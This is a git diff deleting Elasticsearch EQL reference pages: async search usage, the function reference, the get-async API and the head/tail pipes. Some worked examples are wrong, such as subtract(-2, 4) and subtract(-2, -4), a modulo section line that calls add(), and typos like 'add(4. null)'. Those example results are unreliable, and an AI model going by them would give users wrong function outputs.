the events also share the same -tiebreaker value, {es} considers the events concurrent. Concurrent events cannot -be part of the same sequence and may not be returned in a consistent sort order. - -To specify a tiebreaker field, use the `tiebreaker_field` parameter. If you use -the {ecs-ref}[ECS], we recommend using `event.sequence` as the tiebreaker field. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "tiebreaker_field": "event.sequence", - "query": """ - process where process.name == "cmd.exe" and stringContains(process.executable, "System32") - """ -} ----- -// TEST[setup:sec_logs] - -[discrete] -[[eql-search-filter-query-dsl]] -=== Filter using query DSL - -The `filter` parameter uses <> to limit the documents on -which an EQL query runs. - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "filter": { - "range" : { - "file.size" : { - "gte" : 1, - "lte" : 1000000 - } - } - }, - "query": """ - file where (file.type == "file" and file.name == "cmd.exe") - """ -} ----- -// TEST[setup:sec_logs] - -[discrete] -[[eql-search-async]] -=== Run an async EQL search - -By default, EQL search requests are synchronous and wait for complete results -before returning a response. However, complete results can take longer for -searches across <> or -<>. - -To avoid long waits, run an async EQL search. Set the -`wait_for_completion_timeout` parameter to a duration you'd like to wait for -synchronous results. - -[source,console] ----- -GET /frozen-my-index-000001/_eql/search -{ - "wait_for_completion_timeout": "2s", - "query": """ - process where process.name == "cmd.exe" - """ -} ----- -// TEST[setup:sec_logs] -// TEST[s/frozen-my-index-000001/my-index-000001/] - -If the request doesn't finish within the timeout period, the search becomes async -and returns a response that includes: - -* A search ID -* An `is_partial` value of `true`, indicating the search results are - incomplete -* An `is_running` value of `true`, indicating the search is ongoing - -The async search continues to run in the background without blocking other -requests. - -[source,console-result] ----- -{ - "id": "FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=", - "is_partial": true, - "is_running": true, - "took": 2000, - "timed_out": false, - "hits": ... -} ----- -// TESTRESPONSE[s/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=/$body.id/] -// TESTRESPONSE[s/"is_partial": true/"is_partial": $body.is_partial/] -// TESTRESPONSE[s/"is_running": true/"is_running": $body.is_running/] -// TESTRESPONSE[s/"took": 2000/"took": $body.took/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -To check the progress of an async search, use the <> with the search ID. Specify how long you'd like for -complete results in the `wait_for_completion_timeout` parameter. - -[source,console] ----- -GET /_eql/search/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=?wait_for_completion_timeout=2s ----- -// TEST[skip: no access to search ID] - -If the response's `is_running` value is `false`, the async search has finished. -If the `is_partial` value is `false`, the returned search results are -complete. - -[source,console-result] ----- -{ - "id": "FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=", - "is_partial": false, - "is_running": false, - "took": 2000, - "timed_out": false, - "hits": ... -} ----- -// TESTRESPONSE[s/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=/$body.id/] -// TESTRESPONSE[s/"took": 2000/"took": $body.took/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -[discrete] -[[eql-search-store-async-eql-search]] -=== Change the search retention period - -By default, the EQL search API stores async searches for five days. After this -period, any searches and their results are deleted. Use the `keep_alive` -parameter to change this retention period: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "keep_alive": "2d", - "wait_for_completion_timeout": "2s", - "query": """ - process where process.name == "cmd.exe" - """ -} ----- -// TEST[setup:sec_logs] - -You can use the <>'s -`keep_alive` parameter to later change the retention period. The new retention -period starts after the get request runs. - -[source,console] ----- -GET /_eql/search/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=?keep_alive=5d ----- -// TEST[skip: no access to search ID] - -Use the <> to -manually delete an async EQL search before the `keep_alive` period ends. If the -search is still ongoing, {es} cancels the search request. - -[source,console] ----- -DELETE /_eql/search/FmNJRUZ1YWZCU3dHY1BIOUhaenVSRkEaaXFlZ3h4c1RTWFNocDdnY2FSaERnUTozNDE=?keep_alive=5d ----- -// TEST[skip: no access to search ID] - -[discrete] -[[eql-search-store-sync-eql-search]] -=== Store synchronous EQL searches - -By default, the EQL search API only stores async searches. To save a synchronous -search, set `keep_on_completion` to `true`: - -[source,console] ----- -GET /my-index-000001/_eql/search -{ - "keep_on_completion": true, - "wait_for_completion_timeout": "2s", - "query": """ - process where process.name == "cmd.exe" - """ -} ----- -// TEST[setup:sec_logs] - -The response includes a search ID. `is_partial` and `is_running` are `false`, -indicating the EQL search was synchronous and returned complete results. - -[source,console-result] ----- -{ - "id": "FjlmbndxNmJjU0RPdExBTGg0elNOOEEaQk9xSjJBQzBRMldZa1VVQ2pPa01YUToxMDY=", - "is_partial": false, - "is_running": false, - "took": 52, - "timed_out": false, - "hits": ... -} ----- -// TESTRESPONSE[s/FjlmbndxNmJjU0RPdExBTGg0elNOOEEaQk9xSjJBQzBRMldZa1VVQ2pPa01YUToxMDY=/$body.id/] -// TESTRESPONSE[s/"took": 52/"took": $body.took/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -Use the <> to get the -same results later: - -[source,console] ----- -GET /_eql/search/FjlmbndxNmJjU0RPdExBTGg0elNOOEEaQk9xSjJBQzBRMldZa1VVQ2pPa01YUToxMDY= ----- -// TEST[skip: no access to search ID] - -Saved synchronous searches are still subject to the `keep_alive` parameter's -retention period. When this period ends, the search and its results are deleted. - -You can also manually delete saved synchronous searches using the -<>. - -include::syntax.asciidoc[] -include::functions.asciidoc[] -include::pipes.asciidoc[] -include::detect-threats-with-eql.asciidoc[] diff --git a/docs/reference/eql/functions.asciidoc b/docs/reference/eql/functions.asciidoc deleted file mode 100644 index 8d0f1a6da36..00000000000 --- a/docs/reference/eql/functions.asciidoc +++ /dev/null @@ -1,1063 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[eql-function-ref]] -== EQL function reference -++++ -Function reference -++++ - -beta::[] - -{es} supports the following <>. Most EQL functions -are case-sensitive by default. - -[discrete] -[[eql-fn-add]] -=== `add` -Returns the sum of two provided addends. - -*Example* -[source,eql] ----- -add(4, 5) // returns 9 -add(4, 0.5) // returns 4.5 -add(0.5, 0.25) // returns 0.75 -add(4, -2) // returns 2 -add(-2, -2) // returns -4 - -// process.args_count = 4 -add(process.args_count, 5) // returns 9 -add(process.args_count, 0.5) // returns 4.5 - -// process.parent.args_count = 2 -add(process.args_count, process.parent.args_count) // returns 6 - -// null handling -add(null, 4) // returns null -add(4. null) // returns null -add(null, process.args_count) // returns null -add(process.args_count null) // returns null ----- - -*Syntax* -[source,txt] ----- -add(, ) ----- - -*Parameters:* - -``:: -(Required, integer or float or `null`) -Addend to add. If `null`, the function returns `null`. -+ -Two addends are required. No more than two addends can be provided. -+ -If using a field as the argument, this parameter supports only -<> field data types. - -*Returns:* integer, float, or `null` - -[discrete] -[[eql-fn-between]] -=== `between` - -Extracts a substring that's between a provided `left` and `right` text in a -source string. Matching is case-sensitive. - -*Example* -[source,eql] ----- -// file.path = "C:\\Windows\\System32\\cmd.exe" -between(file.path, "system32\\\\", ".exe") // returns "cmd" -between(file.path, "workspace\\\\", ".exe") // returns "" - -// Greedy matching defaults to false. -between(file.path, "\\\\", "\\\\", false) // returns "Windows" - -// Sets greedy matching to true -between(file.path, "\\\\", "\\\\", true) // returns "Windows\\System32" - -// empty source string -between("", "system32\\\\", ".exe") // returns "" -between("", "", "") // returns "" - -// null handling -between(null, "system32\\\\", ".exe") // returns null ----- - -*Syntax* -[source,txt] ----- -between(, , [, ]) ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -Source string. Empty strings return an empty string (`""`), regardless of the -`` or `` parameters. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required, string) -Text to the left of the substring to extract. This text should include -whitespace. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required, string) -Text to the right of the substring to extract. This text should include -whitespace. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -(Optional, Boolean) -If `true`, match the longest possible substring, similar to `.*` in regular -expressions. If `false`, match the shortest possible substring, similar to `.*?` -in regular expressions. Defaults to `false`. - -*Returns:* string or `null` - -[discrete] -[[eql-fn-cidrmatch]] -=== `cidrMatch` - -Returns `true` if an IP address is contained in one or more provided -{wikipedia}/Classless_Inter-Domain_Routing[CIDR] blocks. - -*Example* - -[source,eql] ----- -// source.address = "192.168.152.12" -cidrMatch(source.address, "192.168.0.0/16") // returns true -cidrMatch(source.address, "192.168.0.0/16", "10.0.0.0/8") // returns true -cidrMatch(source.address, "10.0.0.0/8") // returns false -cidrMatch(source.address, "10.0.0.0/8", "10.128.0.0/9") // returns false - -// null handling -cidrMatch(null, "10.0.0.0/8") // returns null -cidrMatch(source.address, null) // returns null ----- - -*Syntax* -[source,txt] ----- -`cidrMatch(, [, ...])` ----- - -*Parameters* - -``:: -(Required, string or `null`) -IP address. Supports -{wikipedia}/IPv4[IPv4] and -{wikipedia}/IPv6[IPv6] addresses. If `null`, the function -returns `null`. -+ -If using a field as the argument, this parameter supports only the <> -field data type. - -``:: -(Required{multi-arg}, string or `null`) -CIDR block you wish to search. If `null`, the function returns `null`. - -*Returns:* boolean or `null` - -[discrete] -[[eql-fn-concat]] -=== `concat` - -Returns a concatenated string of provided values. - -*Example* -[source,eql] ----- -concat("process is ", "regsvr32.exe") // returns "process is regsvr32.exe" -concat("regsvr32.exe", " ", 42) // returns "regsvr32.exe 42" -concat("regsvr32.exe", " ", 42.5) // returns "regsvr32.exe 42.5" -concat("regsvr32.exe", " ", true) // returns "regsvr32.exe true" -concat("regsvr32.exe") // returns "regsvr32.exe" - -// process.name = "regsvr32.exe" -concat(process.name, " ", 42) // returns "regsvr32.exe 42" -concat(process.name, " ", 42.5) // returns "regsvr32.exe 42.5" -concat("process is ", process.name) // returns "process is regsvr32.exe" -concat(process.name, " ", true) // returns "regsvr32.exe true" -concat(process.name) // returns "regsvr32.exe" - -// process.arg_count = 4 -concat(process.name, " ", process.arg_count) // returns "regsvr32.exe 4" - -// null handling -concat(null, "regsvr32.exe") // returns null -concat(process.name, null) // returns null -concat(null) // returns null ----- - -*Syntax* -[source,txt] ----- -concat([, ]) ----- - -*Parameters* - -``:: -(Required{multi-arg-ref}) -Value to concatenate. If any of the arguments are `null`, the function returns `null`. -+ -If using a field as the argument, this parameter does not support the -<> field data type. - -*Returns:* string or `null` - -[discrete] -[[eql-fn-divide]] -=== `divide` -Returns the quotient of a provided dividend and divisor. - -[[eql-divide-fn-float-rounding]] -[WARNING] -==== -If both the dividend and divisor are integers, the `divide` function _rounds -down_ any returned floating point numbers to the nearest integer. To avoid -rounding, convert either the dividend or divisor to a float. - -[%collapsible] -.**Example** -===== -The `process.args_count` field is a <> integer field containing a -count of process arguments. - -A user might expect the following EQL query to only match events with a -`process.args_count` value of `4`. - -[source,eql] ----- -process where divide(4, process.args_count) == 1 ----- - -However, the EQL query matches events with a `process.args_count` value of `3` -or `4`. - -For events with a `process.args_count` value of `3`, the `divide` function -returns a floating point number of `1.333...`, which is rounded down to `1`. - -To match only events with a `process.args_count` value of `4`, convert -either the dividend or divisor to a float. - -The following EQL query changes the integer `4` to the equivalent float `4.0`. - -[source,eql] ----- -process where divide(4.0, process.args_count) == 1 ----- -===== -==== - -*Example* -[source,eql] ----- -divide(4, 2) // returns 2 -divide(4, 3) // returns 1 -divide(4, 3.0) // returns 1.333... -divide(4, 0.5) // returns 8 -divide(0.5, 4) // returns 0.125 -divide(0.5, 0.25) // returns 2.0 -divide(4, -2) // returns -2 -divide(-4, -2) // returns 2 - -// process.args_count = 4 -divide(process.args_count, 2) // returns 2 -divide(process.args_count, 3) // returns 1 -divide(process.args_count, 3.0) // returns 1.333... -divide(12, process.args_count) // returns 3 -divide(process.args_count, 0.5) // returns 8 -divide(0.5, process.args_count) // returns 0.125 - -// process.parent.args_count = 2 -divide(process.args_count, process.parent.args_count) // returns 2 - -// null handling -divide(null, 4) // returns null -divide(4, null) // returns null -divide(null, process.args_count) // returns null -divide(process.args_count, null) // returns null ----- - -*Syntax* -[source,txt] ----- -divide(, ) ----- - -*Parameters* - -``:: -(Required, integer or float or `null`) -Dividend to divide. If `null`, the function returns `null`. -+ -If using a field as the argument, this parameter supports only -<> field data types. - -``:: -(Required, integer or float or `null`) -Divisor to divide by. If `null`, the function returns `null`. This value cannot -be zero (`0`). -+ -If using a field as the argument, this parameter supports only -<> field data types. - -*Returns:* integer, float, or null - -[discrete] -[[eql-fn-endswith]] -=== `endsWith` - -Returns `true` if a source string ends with a provided substring. Matching is -case-sensitive. - -*Example* -[source,eql] ----- -endsWith("regsvr32.exe", ".exe") // returns true -endsWith("regsvr32.exe", ".dll") // returns false -endsWith("", "") // returns true - -// file.name = "regsvr32.exe" -endsWith(file.name, ".exe") // returns true -endsWith(file.name, ".dll") // returns false - -// file.extension = ".exe" -endsWith("regsvr32.exe", file.extension) // returns true -endsWith("ntdll.dll", file.name) // returns false - -// null handling -endsWith("regsvr32.exe", null) // returns null -endsWith("", null) // returns null -endsWith(null, ".exe") // returns null -endsWith(null, null) // returns null ----- - -*Syntax* -[source,txt] ----- -endsWith(, ) ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -Source string. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required, string or `null`) -Substring to search for. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -*Returns:* boolean or `null` - -[discrete] -[[eql-fn-indexof]] -=== `indexOf` - -Returns the first position of a provided substring in a source string. Matching -is case-sensitive. - -If an optional start position is provided, this function returns the first -occurrence of the substring at or after the start position. - -*Example* -[source,eql] ----- -// url.domain = "subdomain.example.com" -indexOf(url.domain, ".") // returns 9 -indexOf(url.domain, ".", 9) // returns 9 -indexOf(url.domain, ".", 10) // returns 17 -indexOf(url.domain, ".", -6) // returns 9 - -// empty strings -indexOf("", "") // returns 0 -indexOf(url.domain, "") // returns 0 -indexOf(url.domain, "", 9) // returns 9 -indexOf(url.domain, "", 10) // returns 10 -indexOf(url.domain, "", -6) // returns 0 - -// missing substrings -indexOf(url.domain, "z") // returns null -indexOf(url.domain, "z", 9) // returns null - -// start position is higher than string length -indexOf(url.domain, ".", 30) // returns null - -// null handling -indexOf(null, ".", 9) // returns null -indexOf(url.domain, null, 9) // returns null -indexOf(url.domain, ".", null) // returns null ----- - -*Syntax* -[source,txt] ----- -indexOf(, [, ]) ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -Source string. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required, string or `null`) -Substring to search for. - -If this argument is `null` or the `` string does not contain this -substring, the function returns `null`. - -If the `` is positive, empty strings (`""`) return the ``. -Otherwise, empty strings return `0`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Optional, integer or `null`) -Starting position for matching. The function will not return positions before -this one. Defaults to `0`. - -Positions are zero-indexed. Negative offsets are treated as `0`. - -If this argument is `null` or higher than the length of the `` string, -the function returns `null`. - -If using a field as the argument, this parameter supports only the following -<> field data types: - -* `long` -* `integer` -* `short` -* `byte` --- - -*Returns:* integer or `null` - -[discrete] -[[eql-fn-length]] -=== `length` - -Returns the character length of a provided string, including whitespace and -punctuation. - -*Example* -[source,eql] ----- -length("explorer.exe") // returns 12 -length("start explorer.exe") // returns 18 -length("") // returns 0 -length(null) // returns null - -// process.name = "regsvr32.exe" -length(process.name) // returns 12 ----- - -*Syntax* -[source,txt] ----- -length() ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -String for which to return the character length. If `null`, the function returns -`null`. Empty strings return `0`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -*Returns:* integer or `null` - -[discrete] -[[eql-fn-modulo]] -=== `modulo` -Returns the remainder of the division of a provided dividend and divisor. - -*Example* -[source,eql] ----- -modulo(10, 6) // returns 4 -modulo(10, 5) // returns 0 -modulo(10, 0.5) // returns 0 -modulo(10, -6) // returns 4 -modulo(-10, -6) // returns -4 - -// process.args_count = 10 -modulo(process.args_count, 6) // returns 4 -modulo(process.args_count, 5) // returns 0 -modulo(106, process.args_count) // returns 6 -modulo(process.args_count, -6) // returns 4 -modulo(process.args_count, 0.5) // returns 0 - -// process.parent.args_count = 6 -add(process.args_count, process.parent.args_count) // returns 4 - -// null handling -modulo(null, 5) // returns null -modulo(7, null) // returns null -modulo(null, process.args_count) // returns null -modulo(process.args_count, null) // returns null ----- - -*Syntax* -[source,txt] ----- -modulo(, ) ----- - -*Parameters* - -``:: -(Required, integer or float or `null`) -Dividend to divide. If `null`, the function returns `null`. Floating point -numbers return `0`. -+ -If using a field as the argument, this parameter supports only -<> field data types. - -``:: -(Required, integer or float or `null`) -Divisor to divide by. If `null`, the function returns `null`. Floating point -numbers return `0`. This value cannot be zero (`0`). -+ -If using a field as the argument, this parameter supports only -<> field data types. - -*Returns:* integer, float, or `null` - -[discrete] -[[eql-fn-multiply]] -=== `multiply` - -Returns the product of two provided factors. - -*Example* -[source,eql] ----- -multiply(2, 2) // returns 4 -multiply(0.5, 2) // returns 1 -multiply(0.25, 2) // returns 0.5 -multiply(-2, 2) // returns -4 -multiply(-2, -2) // returns 4 - -// process.args_count = 2 -multiply(process.args_count, 2) // returns 4 -multiply(0.5, process.args_count) // returns 1 -multiply(0.25, process.args_count) // returns 0.5 - -// process.parent.args_count = 3 -multiply(process.args_count, process.parent.args_count) // returns 6 - -// null handling -multiply(null, 2) // returns null -multiply(2, null) // returns null ----- - -*Syntax* -[source,txt] ----- -multiply() ----- - -*Parameters* - -``:: -+ --- -(Required, integer or float or `null`) -Factor to multiply. If `null`, the function returns `null`. - -Two factors are required. No more than two factors can be provided. - -If using a field as the argument, this parameter supports only -<> field data types. --- - -*Returns:* integer, float, or `null` - -[discrete] -[[eql-fn-number]] -=== `number` - -Converts a string to the corresponding integer or float. - -*Example* -[source,eql] ----- -number("1337") // returns 1337 -number("42.5") // returns 42.5 -number("deadbeef", 16) // returns 3735928559 - -// integer literals beginning with "0x" are auto-detected as hexadecimal -number("0xdeadbeef") // returns 3735928559 -number("0xdeadbeef", 16) // returns 3735928559 - -// "+" and "-" are supported -number("+1337") // returns 1337 -number("-1337") // returns -1337 - -// surrounding whitespace is ignored -number(" 1337 ") // returns 1337 - -// process.pid = "1337" -number(process.pid) // returns 1337 - -// null handling -number(null) // returns null -number(null, 16) // returns null - -// strings beginning with "0x" are treated as hexadecimal (base 16), -// even if the is explicitly null. -number("0xdeadbeef", null) // returns 3735928559 - -// otherwise, strings are treated as decimal (base 10) -// if the is explicitly null. -number("1337", null) // returns 1337 ----- - -*Syntax* -[source,txt] ----- -number([, ]) ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -String to convert to an integer or float. If this value is a string, it must be -one of the following: - -* A string representation of an integer (e.g., `"42"`) -* A string representation of a float (e.g., `"9.5"`) -* If the `` parameter is specified, a string containing an integer - literal in the base notation (e.g., `"0xDECAFBAD"` in hexadecimal or base - `16`) - -Strings that begin with `0x` are auto-detected as hexadecimal and use a default -`` of `16`. - -`-` and `+` are supported with no space between. Surrounding whitespace is -ignored. Empty strings (`""`) are not supported. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field - -If this argument is `null`, the function returns `null`. --- - -``:: -+ --- -(Optional, integer or `null`) -Radix or base used to convert the string. If the `` begins with `0x`, -this parameter defaults to `16` (hexadecimal). Otherwise, it defaults to base -`10`. - -If this argument is explicitly `null`, the default value is used. - -Fields are not supported as arguments. --- - -*Returns:* integer or float or `null` - -[discrete] -[[eql-fn-startswith]] -=== `startsWith` - -Returns `true` if a source string begins with a provided substring. Matching is -case-sensitive. - -*Example* -[source,eql] ----- -startsWith("regsvr32.exe", "regsvr32") // returns true -startsWith("regsvr32.exe", "explorer") // returns false -startsWith("", "") // returns true - -// process.name = "regsvr32.exe" -startsWith(process.name, "regsvr32") // returns true -startsWith(process.name, "explorer") // returns false - -// process.name = "regsvr32" -startsWith("regsvr32.exe", process.name) // returns true -startsWith("explorer.exe", process.name) // returns false - -// null handling -startsWith("regsvr32.exe", null) // returns null -startsWith("", null) // returns null -startsWith(null, "regsvr32") // returns null -startsWith(null, null) // returns null ----- - -*Syntax* -[source,txt] ----- -startsWith(, ) ----- - -*Parameters* - -``:: -+ --- -(Required, string or `null`) -Source string. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required, string or `null`) -Substring to search for. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -*Returns:* boolean or `null` - -[discrete] -[[eql-fn-string]] -=== `string` - -Converts a value to a string. - -*Example* -[source,eql] ----- -string(42) // returns "42" -string(42.5) // returns "42.5" -string("regsvr32.exe") // returns "regsvr32.exe" -string(true) // returns "true" - -// null handling -string(null) // returns null ----- - -*Syntax* -[source,txt] ----- -string() ----- - -*Parameters* - -``:: -(Required) -Value to convert to a string. If `null`, the function returns `null`. -+ -If using a field as the argument, this parameter does not support the -<> field data type. - -*Returns:* string or `null` - -[discrete] -[[eql-fn-stringcontains]] -=== `stringContains` - -Returns `true` if a source string contains a provided substring. Matching is -case-sensitive. - -*Example* -[source,eql] ----- -// process.command_line = "start regsvr32.exe" -stringContains(process.command_line, "regsvr32") // returns true -stringContains(process.command_line, "start ") // returns true -stringContains(process.command_line, "explorer") // returns false - -// process.name = "regsvr32.exe" -stringContains(command_line, process.name) // returns true - -// empty strings -stringContains("", "") // returns false -stringContains(process.command_line, "") // returns false - -// null handling -stringContains(null, "regsvr32") // returns null -stringContains(process.command_line, null) // returns null ----- - -*Syntax* -[source,txt] ----- -stringContains(, ) ----- - -*Parameters* - -``:: -(Required, string or `null`) -Source string to search. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field - -``:: -(Required, string or `null`) -Substring to search for. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field - -*Returns:* boolean or `null` - -[discrete] -[[eql-fn-substring]] -=== `substring` - -Extracts a substring from a source string at provided start and end positions. - -If no end position is provided, the function extracts the remaining string. - -*Example* -[source,eql] ----- -substring("start regsvr32.exe", 6) // returns "regsvr32.exe" -substring("start regsvr32.exe", 0, 5) // returns "start" -substring("start regsvr32.exe", 6, 14) // returns "regsvr32" -substring("start regsvr32.exe", -4) // returns ".exe" -substring("start regsvr32.exe", -4, -1) // returns ".ex" ----- - -*Syntax* -[source,txt] ----- -substring(, [, ]) ----- - -*Parameters* - -``:: -(Required, string) -Source string. - -``:: -+ --- -(Required, integer) -Starting position for extraction. - -If this position is higher than the `` position or the length of the -`` string, the function returns an empty string. - -Positions are zero-indexed. Negative offsets are supported. --- - -``:: -(Optional, integer) -Exclusive end position for extraction. If this position is not provided, the -function returns the remaining string. -+ -Positions are zero-indexed. Negative offsets are supported. - -*Returns:* string - -[discrete] -[[eql-fn-subtract]] -=== `subtract` -Returns the difference between a provided minuend and subtrahend. - -*Example* -[source,eql] ----- -subtract(10, 2) // returns 8 -subtract(10.5, 0.5) // returns 10 -subtract(1, 0.2) // returns 0.8 -subtract(-2, 4) // returns -8 -subtract(-2, -4) // returns 8 - -// process.args_count = 10 -subtract(process.args_count, 6) // returns 4 -subtract(process.args_count, 5) // returns 5 -subtract(15, process.args_count) // returns 5 -subtract(process.args_count, 0.5) // returns 9.5 - -// process.parent.args_count = 6 -subtract(process.args_count, process.parent.args_count) // returns 4 - -// null handling -subtract(null, 2) // returns null -subtract(2, null) // returns null ----- - -*Syntax* -[source,txt] ----- -subtract(, ) ----- - -*Parameters* - -``:: -(Required, integer or float or `null`) -Minuend to subtract from. -+ -If using a field as the argument, this parameter supports only -<> field data types. - -``:: -(Optional, integer or float or `null`) -Subtrahend to subtract. If `null`, the function returns `null`. -+ -If using a field as the argument, this parameter supports only -<> field data types. - -*Returns:* integer, float, or `null` - -[discrete] -[[eql-fn-wildcard]] -=== `wildcard` - -Returns `true` if a source string matches one or more provided wildcard -expressions. Matching is case-sensitive. - -*Example* -[source,eql] ----- -// process.name = "regsvr32.exe" -wildcard(process.name, "*regsvr32*") // returns true -wildcard(process.name, "*regsvr32*", "*explorer*") // returns true -wildcard(process.name, "*explorer*") // returns false -wildcard(process.name, "*explorer*", "*scrobj*") // returns false - -// empty strings -wildcard("", "*start*") // returns false -wildcard("", "*") // returns true -wildcard("", "") // returns true - -// null handling -wildcard(null, "*regsvr32*") // returns null -wildcard(process.name, null) // returns null ----- - -*Syntax* -[source,txt] ----- -wildcard(, [, ...]) ----- - -*Parameters* - -``:: -+ --- -(Required, string) -Source string. If `null`, the function returns `null`. - -If using a field as the argument, this parameter supports only the following -field data types: - -* A type in the <> family -* <> field with a <> sub-field --- - -``:: -+ --- -(Required{multi-arg-ref}, string) -Wildcard expression used to match the source string. If `null`, the function -returns `null`. Fields are not supported as arguments. --- - -*Returns:* boolean diff --git a/docs/reference/eql/get-async-eql-search-api.asciidoc b/docs/reference/eql/get-async-eql-search-api.asciidoc deleted file mode 100644 index 65f88cf7c88..00000000000 --- a/docs/reference/eql/get-async-eql-search-api.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[role="xpack"] -[testenv="basic"] - -[[get-async-eql-search-api]] -=== Get async EQL search API -++++ -Get async EQL search -++++ - -beta::[] - -Returns the current status and available results for an <> or a <>. - -[source,console] ----- -GET /_eql/search/FkpMRkJGS1gzVDRlM3g4ZzMyRGlLbkEaTXlJZHdNT09TU2VTZVBoNDM3cFZMUToxMDM= ----- -// TEST[skip: no access to search ID] - -[[get-async-eql-search-api-request]] -==== {api-request-title} - -`GET /_eql/search/` - -[[get-async-eql-search-api-prereqs]] -==== {api-prereq-title} - -See <>. - -[[get-async-eql-search-api-limitations]] -===== Limitations - -See <>. - -[[get-async-eql-search-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Identifier for the search. -+ -A search ID is provided in the <>'s response for -an <>. A search ID is also provided if the -request's <> parameter -is `true`. - -[[get-async-eql-search-api-query-params]] -==== {api-query-parms-title} - -`keep_alive`:: -(Optional, <>) -Period for which the search and its results are stored on the cluster. Defaults -to the `keep_alive` value set by the search's <> request. -+ -If specified, this parameter sets a new `keep_alive` period for the search, -starting when the get async EQL search API request executes. This new period -overwrites the one specified in the EQL search API request. -+ -When this period expires, the search and its results are deleted, even if the -search is ongoing. - -`wait_for_completion_timeout`:: -(Optional, <>) -Timeout duration to wait for the request to finish. Defaults to no timeout, -meaning the request waits for complete search results. -+ -If this parameter is specified and the request completes during this period, -complete search results are returned. -+ -If the request does not complete during this period, the response returns an -`is_partial` value of `true` and no search results. - -[role="child_attributes"] -[[get-async-eql-search-api-response-body]] -==== {api-response-body-title} - -The async EQL search API returns the same response body as the EQL search API. -See the EQL search API's <>. \ No newline at end of file diff --git a/docs/reference/eql/pipes.asciidoc b/docs/reference/eql/pipes.asciidoc deleted file mode 100644 index 9925f5c4f32..00000000000 --- a/docs/reference/eql/pipes.asciidoc +++ /dev/null @@ -1,73 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[eql-pipe-ref]] -== EQL pipe reference -++++ -Pipe reference -++++ - -beta::[] - -{es} supports the following <>. - -[discrete] -[[eql-pipe-head]] -=== `head` - -Returns up to a specified number of events or sequences, starting with the -earliest matches. Works similarly to the -{wikipedia}/Head_(Unix)[Unix head command]. - -*Example* - -The following EQL query returns up to three of the earliest powershell -commands. - -[source,eql] ----- -process where process.name == "powershell.exe" -| head 3 ----- - -*Syntax* -[source,txt] ----- -head ----- - -*Parameters* - -``:: -(Required, integer) -Maximum number of matching events or sequences to return. - -[discrete] -[[eql-pipe-tail]] -=== `tail` - -Returns up to a specified number of events or sequences, starting with the most -recent matches. Works similarly to the -{wikipedia}/Tail_(Unix)[Unix tail command]. - -*Example* - -The following EQL query returns up to five of the most recent `svchost.exe` -processes. - -[source,eql] ----- -process where process.name == "svchost.exe" -| tail 5 ----- - -*Syntax* -[source,txt] ----- -tail ----- - -*Parameters* - -``:: -(Required, integer) -Maximum number of matching events or sequences to return. diff --git a/docs/reference/eql/syntax.asciidoc b/docs/reference/eql/syntax.asciidoc deleted file mode 100644 index 2607f6ae6fd..00000000000 --- a/docs/reference/eql/syntax.asciidoc +++ /dev/null @@ -1,972 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[eql-syntax]] -== EQL syntax reference -++++ -Syntax reference -++++ - -beta::[] - -[discrete] -[[eql-basic-syntax]] -=== Basic syntax - -EQL queries require an event category and a matching condition. The `where` -keyword connects them. - -[source,eql] ----- -event_category where condition ----- - -For example, the following EQL query matches `process` events with a -`process.name` field value of `svchost.exe`: - -[source,eql] ----- -process where process.name == "svchost.exe" ----- - -[discrete] -[[eql-syntax-event-categories]] -=== Event categories - -An event category is a valid, 